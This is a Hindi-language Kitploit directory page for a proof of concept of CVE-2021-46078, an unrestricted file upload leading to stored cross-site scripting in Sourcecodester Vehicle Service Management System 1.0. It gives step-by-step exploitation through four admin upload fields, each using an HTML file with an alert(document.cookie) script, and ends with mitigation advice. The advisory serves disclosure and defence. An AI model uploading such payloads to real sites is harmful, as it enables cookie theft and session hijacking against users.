Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-46078 — CVE-2021-46078 - Sourcecodester Vehicle Service Management System 1.0 में एक Unrestricted File Upload भेद्यता मौजूद है. एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे Stored Cross-Site Scripting भेद्यता उत्पन्न होती है. | Kitploit
उपकरण/GitHubGitHub/sanupl/cve-2021-46078
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubsanupl/cve-2021-46078

CVE-2021-46078

CVE-2021-46078 - Sourcecodester Vehicle Service Management System 1.0 में एक Unrestricted File Upload भेद्यता मौजूद है. एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे Stored Cross-Site Scripting भेद्यता उत्पन्न होती है.

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-46078

शोषण शीर्षक: Vehicle Service Management System - 'Multiple' फ़ाइल अपलोड से Stored Cross-Site Scripting उत्पन्न होती है

शोषण लेखक: SANU P.L

CVE: CVE-2021-46078

CVSS: 4.8 MEDIUM

संदर्भ:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

विवरण:

Sourcecodester Vehicle Service Management System 1.0 में एक अनियंत्रित फ़ाइल अपलोड भेद्यता मौजूद है। एक दूरस्थ हमलावर दुर्भावनापूर्ण फ़ाइलें अपलोड कर सकता है, जिससे Stored Cross-Site Scripting भेद्यता उत्पन्न होती है।

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. My Account अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=user

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, जैसे: XSS.html
  2. My Account अनुभाग में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल चुनें।
  3. अपडेट बटन पर क्लिक करें।
  4. Avatar छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड ट्रिगर हो गया।

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. User List अनुभाग पर जाएँ और Create New बटन पर क्लिक करें।

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, जैसे: XSS.html
  2. Create New User पृष्ठ में सभी आवश्यक विवरण दर्ज करें और Avatar में html फ़ाइल चुनें।
  3. Save बटन पर क्लिक करें।
  4. Avatar छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड ट्रिगर हो गया।

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, जैसे: XSS.html
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और System Logo में html फ़ाइल चुनें।
  3. अपडेट बटन पर क्लिक करें।
  4. System Logo छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड ट्रिगर हो गया।

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

शोषण:

  1. एडमिन पैनल में लॉगिन करें http://localhost/vehicle_service/admin
  2. Settings अनुभाग पर जाएँ http://localhost/vehicle_service/admin/?page=system_info

पेलोड:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. उपरोक्त html कोड को सहेजें, जैसे: XSS.html
  2. Settings अनुभाग में सभी आवश्यक विवरण दर्ज करें और Website Cover में html फ़ाइल चुनें।
  3. अपडेट बटन पर क्लिक करें।
  4. Website Cover छवि को नए टैब में खोलें।
  5. दुर्भावनापूर्ण जावास्क्रिप्ट कोड ट्रिगर हो गया।

प्रभाव:

एक हमलावर कई एंडपॉइंट्स पर दुर्भावनापूर्ण फ़ाइल अपलोड कर सकता है, जिससे Stored Cross-Site Scripting उत्पन्न होती है।

शमन:

निम्नलिखित को लागू करने की अनुशंसा की जाती है:

  • व्हाइट-लिस्ट फ़िल्टर के बिना किसी फ़ाइल नाम और उसके एक्सटेंशन को सीधे स्वीकार न करें।
  • यदि यूनिकोड वर्णों की आवश्यकता नहीं है, तो अत्यधिक अनुशंसा की जाती है कि फ़ाइल नाम और एक्सटेंशन के लिए केवल अल्फा-न्यूमेरिक वर्ण और केवल एक डॉट इनपुट के रूप में स्वीकार करें।
  • डिनायल ऑफ सर्विस हमलों को रोकने के लिए फ़ाइल आकार को अधिकतम मान तक सीमित करें।
  • अपलोड की गई निर्देशिका में कोई "execute" अनुमति नहीं होनी चाहिए।
  • केवल क्लाइंट-साइड सत्यापन पर भरोसा न करें।
टूल डाउनलोड करें